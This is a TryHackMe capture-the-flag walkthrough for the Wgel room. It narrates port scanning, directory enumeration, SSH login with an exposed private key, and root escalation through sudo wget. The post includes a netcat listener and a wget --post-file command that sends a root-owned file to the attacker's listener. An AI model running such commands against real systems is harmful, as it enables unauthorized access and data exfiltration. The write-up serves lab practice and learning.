Sws101_wgel
Topic : Wgel - TryHackMe Walkthrough
Introduction:
In this journal post, I will be detailing the process and actions that were taken to acquire the final user and root flags within the Wgel CTF room in TryHackMe. This particular room’s goal is to familiarize oneself with reconnaissance, web qualifications, and ascending privilege practices to perform unauthorized access and data acquisition illicitly.
Walkthrough:
- Reconnaissance & User Flag:
I began by running an Nmap scan on the target machine, which revealed two open ports: 22 the secure simple connection, S and 80 the standard hypertext transfer protocol. When I typed the given IP address on my browser, a page with the title ‘Welcome to Apache2 Ubuntu’ popped up.
If I had examined the source code, I would have found a comment saying there may be something like “ Jessie”. After that, I used gobuster for the directory associated with the website and found a directory named “/sitemap”. Subcategories can be listed by running /sitemap // and there is a “hidden” directory named “. ssh” that contains the RSA private key.
To use the private key for authentication, I copied it to my attacker machine and the set appropriate permissions by using the command chmod 600 fileName id_rsa. I then was able to shh into the machine using the discovered username as ‘jessie’ and the obtained RSA key. When I was able to login, I searched for the user flag using the command locate and luckily, I was able to obtain it.
- Root Flag:
To escalate privileges, I ran the command “sudo -l” and discovered that I could run “/usr/bin/wget” as the root user. This presented an opportunity for privilege escalation.
Referring to GTFOBins (https://gtfobins.github.io/), I searched for the “wget” binary and found a suitable exploit. The exploit required starting a netcat listener on my attacker machine and then executing “wget” with sudo privileges on the victim machine to post a file to the listener.
On my attacker machine, I initiated a netcat listener using the command “nc -lvnp 9001”. Then, on the victim machine (logged in as the “jessie” user), I ran the following command: sudo /usr/bin/wget –post-file=/root/root_flag.txt http://
Conclusion:
In conclusion, the Wgel CTF room offered a great chance to practice a variety of hacking methods, such as privilege escalation, web enumeration, and reconnaissance. Through the discovery of a hidden directory, the acquisition of an SSH private key, and the utilization of a sudo misconfiguration with the “wget” binary, I managed to get root and user flags without authorization on the system. This experience made it even more clear how crucial it is to properly examine online apps, look for configuration errors, and use the resources and tools that are readily available—like GTFOBins—in order to find and exploit vulnerabilities.
All things considered, finishing the Wgel CTF room helped me apply my knowledge in a real-world setting and deepened my comprehension of the hacking process. It acts as a reminder of the ongoing requirement for watchfulness and appropriate security setups in order to thwart unwanted access and safeguard confidential data.